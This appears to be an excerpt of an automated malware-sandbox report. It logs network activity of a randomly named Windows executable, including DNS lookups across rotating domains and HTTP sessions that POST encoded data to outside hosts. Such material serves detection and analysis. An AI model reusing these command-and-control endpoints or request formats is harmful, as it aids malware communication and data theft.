                                                                          Nov 12, 2024 08:54:07.051065922 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.051074028 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.051136017 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.051199913 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.051222086 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.051233053 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.051470041 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.658231974 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.658286095 CET5003480192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:08.554296017 CET5003480192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:08.559132099 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:09.648082018 CET5003580192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:09.653026104 CET80500353.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:09.653095961 CET5003580192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:09.665139914 CET5003580192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:09.670264959 CET80500353.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:10.314495087 CET80500353.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:10.315032959 CET80500353.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:10.315196991 CET5003580192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:10.317769051 CET5003580192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:10.322664022 CET80500353.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:15.339412928 CET5003680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:15.344198942 CET80500363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:15.344322920 CET5003680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:15.359469891 CET5003680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:15.364311934 CET80500363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:15.968468904 CET80500363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:15.968544006 CET5003680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:16.866312981 CET5003680192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:17.054151058 CET80500363.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:17.884097099 CET5003780192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:17.888972998 CET80500373.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:17.889067888 CET5003780192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:17.900393963 CET5003780192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:17.905173063 CET80500373.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:18.514641047 CET80500373.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:18.522396088 CET5003780192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:19.411953926 CET5003780192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:19.420591116 CET80500373.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.434303045 CET5003880192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:20.439263105 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.443342924 CET5003880192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:20.458427906 CET5003880192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:20.463341951 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.463366032 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.463421106 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.463429928 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.463469028 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.463543892 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.463553905 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.463563919 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:20.463572979 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:21.069780111 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:21.069955111 CET5003880192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:21.958883047 CET5003880192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:21.964123964 CET80500383.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:22.980350971 CET5003980192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:22.985271931 CET80500393.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:22.985443115 CET5003980192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:22.992609024 CET5003980192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:22.997500896 CET80500393.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:24.558825970 CET80500393.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:24.559272051 CET80500393.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:24.559479952 CET5003980192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:24.562325001 CET5003980192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:24.567137957 CET80500393.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:30.256834984 CET5004080192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:30.261624098 CET805004047.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:30.261687994 CET5004080192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:30.273874998 CET5004080192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:30.278675079 CET805004047.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:31.225981951 CET805004047.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:31.356693983 CET5004080192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:31.410409927 CET805004047.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:31.410510063 CET5004080192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:31.787094116 CET5004080192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:32.806329966 CET5004180192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:32.811322927 CET805004147.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:32.814430952 CET5004180192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:32.824914932 CET5004180192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:32.829739094 CET805004147.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:33.780483007 CET805004147.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:33.849414110 CET5004180192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:33.967168093 CET805004147.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:33.967226982 CET5004180192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:34.334454060 CET5004180192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:35.352833033 CET5004280192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:35.357728004 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.357795000 CET5004280192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:35.370755911 CET5004280192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:35.375649929 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.375660896 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.375672102 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.375680923 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.375705957 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.375727892 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.375812054 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.375821114 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:35.375839949 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:36.344410896 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:36.396415949 CET5004280192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:36.540920019 CET805004247.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:36.544584990 CET5004280192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:36.884682894 CET5004280192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:37.906409979 CET5004380192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:37.911293030 CET805004347.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:37.911371946 CET5004380192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:37.918623924 CET5004380192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:37.923441887 CET805004347.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:38.899147987 CET805004347.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:39.091541052 CET805004347.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:39.091799974 CET5004380192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:39.093575954 CET5004380192.168.2.447.52.221.8
                                                                          Nov 12, 2024 08:54:39.098458052 CET805004347.52.221.8192.168.2.4
                                                                          Nov 12, 2024 08:54:44.388387918 CET5004480192.168.2.423.106.59.18
                                                                          Nov 12, 2024 08:54:44.582806110 CET805004423.106.59.18192.168.2.4
                                                                          Nov 12, 2024 08:54:44.582902908 CET5004480192.168.2.423.106.59.18
                                                                          Nov 12, 2024 08:54:44.759210110 CET5004480192.168.2.423.106.59.18
                                                                          Nov 12, 2024 08:54:44.764074087 CET805004423.106.59.18192.168.2.4
                                                                          Nov 12, 2024 08:54:45.393728971 CET805004423.106.59.18192.168.2.4
                                                                          Nov 12, 2024 08:54:45.442382097 CET5004480192.168.2.423.106.59.18
                                                                          Nov 12, 2024 08:54:45.498735905 CET805004423.106.59.18192.168.2.4
                                                                          Nov 12, 2024 08:54:45.498827934 CET5004480192.168.2.423.106.59.18

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 12, 2024 08:52:08.126183033 CET6020653192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:52:08.150079966 CET53602061.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:52:23.853244066 CET4972553192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:52:23.914774895 CET53497251.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:52:37.618757963 CET5494553192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:52:37.856441021 CET53549451.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:52:52.133390903 CET6353253192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:52:52.571801901 CET53635321.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:53:05.884927988 CET6188353192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:53:05.902237892 CET53618831.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:53:19.276222944 CET6193553192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:53:19.589313984 CET53619351.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:53:33.419606924 CET5170753192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:53:33.466208935 CET53517071.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:53:48.212358952 CET5533853192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:53:48.302865982 CET53553381.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:54:01.915544033 CET6333953192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:54:01.929088116 CET53633391.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:54:15.322459936 CET5513753192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:54:15.335649014 CET53551371.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:54:29.575325012 CET6238953192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:54:30.254235029 CET53623891.1.1.1192.168.2.4
                                                                          Nov 12, 2024 08:54:44.103538036 CET5817653192.168.2.41.1.1.1
                                                                          Nov 12, 2024 08:54:44.381175995 CET53581761.1.1.1192.168.2.4

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Nov 12, 2024 08:52:08.126183033 CET192.168.2.41.1.1.10xe79eStandard query (0)www.corpseflowerwatch.orgA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:23.853244066 CET192.168.2.41.1.1.10x2147Standard query (0)www.4nk.educationA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:37.618757963 CET192.168.2.41.1.1.10x4436Standard query (0)www.migraine-massages.proA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:52.133390903 CET192.168.2.41.1.1.10x3cStandard query (0)www.vnxoso88.artA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:05.884927988 CET192.168.2.41.1.1.10x6e7Standard query (0)www.pluribiz.lifeA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:19.276222944 CET192.168.2.41.1.1.10x150bStandard query (0)www.kdtzhb.topA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:33.419606924 CET192.168.2.41.1.1.10x7d74Standard query (0)www.evoo.websiteA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:48.212358952 CET192.168.2.41.1.1.10xb48fStandard query (0)www.astorg-group.infoA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:01.915544033 CET192.168.2.41.1.1.10x1ba5Standard query (0)www.fiqsth.vipA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:15.322459936 CET192.168.2.41.1.1.10xfd91Standard query (0)www.bio-thymus.comA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:29.575325012 CET192.168.2.41.1.1.10xfaa6Standard query (0)www.wukong.collegeA (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:44.103538036 CET192.168.2.41.1.1.10x7650Standard query (0)www.vehiculargustav.clickA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Nov 12, 2024 08:52:08.150079966 CET1.1.1.1192.168.2.40xe79eNo error (0)www.corpseflowerwatch.orgcorpseflowerwatch.orgCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:08.150079966 CET1.1.1.1192.168.2.40xe79eNo error (0)corpseflowerwatch.org3.33.130.190A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:08.150079966 CET1.1.1.1192.168.2.40xe79eNo error (0)corpseflowerwatch.org15.197.148.33A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:23.914774895 CET1.1.1.1192.168.2.40x2147No error (0)www.4nk.educationwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:23.914774895 CET1.1.1.1192.168.2.40x2147No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:37.856441021 CET1.1.1.1192.168.2.40x4436No error (0)www.migraine-massages.pro199.59.243.227A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:52.571801901 CET1.1.1.1192.168.2.40x3cNo error (0)www.vnxoso88.art77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 12, 2024 08:52:52.571801901 CET1.1.1.1192.168.2.40x3cNo error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:05.902237892 CET1.1.1.1192.168.2.40x6e7No error (0)www.pluribiz.life209.74.64.58A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:19.589313984 CET1.1.1.1192.168.2.40x150bNo error (0)www.kdtzhb.top47.242.89.146A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:33.466208935 CET1.1.1.1192.168.2.40x7d74No error (0)www.evoo.website128.65.195.180A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:48.302865982 CET1.1.1.1192.168.2.40xb48fNo error (0)www.astorg-group.infowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 12, 2024 08:53:48.302865982 CET1.1.1.1192.168.2.40xb48fNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:01.929088116 CET1.1.1.1192.168.2.40x1ba5No error (0)www.fiqsth.vipfiqsth.vipCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:01.929088116 CET1.1.1.1192.168.2.40x1ba5No error (0)fiqsth.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:01.929088116 CET1.1.1.1192.168.2.40x1ba5No error (0)fiqsth.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:15.335649014 CET1.1.1.1192.168.2.40xfd91No error (0)www.bio-thymus.combio-thymus.comCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:15.335649014 CET1.1.1.1192.168.2.40xfd91No error (0)bio-thymus.com3.33.130.190A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:15.335649014 CET1.1.1.1192.168.2.40xfd91No error (0)bio-thymus.com15.197.148.33A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:30.254235029 CET1.1.1.1192.168.2.40xfaa6No error (0)www.wukong.college47.52.221.8A (IP address)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:44.381175995 CET1.1.1.1192.168.2.40x7650No error (0)www.vehiculargustav.clickppp84k45ss7ehy8ypic5x.limelightcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 12, 2024 08:54:44.381175995 CET1.1.1.1192.168.2.40x7650No error (0)ppp84k45ss7ehy8ypic5x.limelightcdn.com23.106.59.18A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.corpseflowerwatch.org
                                                                          • www.4nk.education
                                                                          • www.migraine-massages.pro
                                                                          • www.vnxoso88.art
                                                                          • www.pluribiz.life
                                                                          • www.kdtzhb.top
                                                                          • www.evoo.website
                                                                          • www.astorg-group.info
                                                                          • www.fiqsth.vip
                                                                          • www.bio-thymus.com
                                                                          • www.wukong.college
                                                                          • www.vehiculargustav.click

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.4497363.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:08.170483112 CET381OUTGET /yjfe/?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.corpseflowerwatch.org
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:52:08.804238081 CET400INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Tue, 12 Nov 2024 07:52:08 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 260
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4c 32 6d 30 5a 6e 3d 73 73 4c 6c 2f 37 30 47 41 68 55 63 4b 64 44 6a 45 6c 66 39 6f 59 37 63 31 54 6f 65 2f 4c 4b 5a 33 76 73 4a 63 63 4f 55 48 79 43 71 7a 63 70 66 72 49 72 72 64 30 34 61 32 4f 41 4e 36 57 66 48 68 77 79 42 30 52 51 2b 44 6c 6a 6e 48 75 36 52 67 75 70 52 59 71 7a 39 33 45 34 59 59 69 47 77 77 52 51 75 46 31 41 4f 53 7a 61 52 37 32 4c 62 46 6e 30 39 36 56 77 3d 26 4a 50 63 3d 4e 42 51 64 42 42 6b 50 57 54 53 74 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX"}</script></head></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449737217.70.184.50802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:23.933362007 CET634OUTPOST /gnvu/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.4nk.education
                                                                          Origin: http://www.4nk.education
                                                                          Referer: http://www.4nk.education/gnvu/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 56 54 6c 50 34 43 6f 33 2b 73 53 46 39 58 35 37 77 41 6c 4e 44 71 4d 37 66 63 49 50 2b 57 4d 55 67 3d 3d
                                                                          Data Ascii: L2m0Zn=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTVTlP4Co3+sSF9X57wAlNDqM7fcIP+WMUg==
                                                                          Nov 12, 2024 08:52:24.748008966 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:52:24 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.449738217.70.184.50802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:26.546372890 CET654OUTPOST /gnvu/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.4nk.education
                                                                          Origin: http://www.4nk.education
                                                                          Referer: http://www.4nk.education/gnvu/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 42 33 4b 38 4e 69 6b 2b 4b 71 34 62 43 4c 48 73 4a 68 6f 39 44 46 6d 43 30 48 47 72 54 5a 71 42 73 4c 41 53 33 64 4f 77 32 59 72 2b 32 37 59 77 6f 47 2f 71 53 4a 53 39 48 55 74 6f 64 6c 53 56 6a 58 51 69 4d 6b 42 43 69 61 35 32 76 2b 46 74 2f 76 39 56 2b 77 6c 63 47 64 2f 68 67 51 32 4d 65 70 36 75 6e 45 79 36 44 37 4c 39 6f 66 4b 2b 2b 43 6d 66 55 67 2b 63 55 71 75 49 65 57 63 32 74 77 65 45 37 61 6a 71 42 68 79 66 44 4f 2f 6d 59 56 38 43 39 72 46 50 6d 54 66 36 66 79 6e 45 50 31 71 79 6d 6e 32 37 46 30 49 30 52 6b 3d
                                                                          Data Ascii: L2m0Zn=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDO/mYV8C9rFPmTf6fynEP1qymn27F0I0Rk=
                                                                          Nov 12, 2024 08:52:27.325246096 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:52:27 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
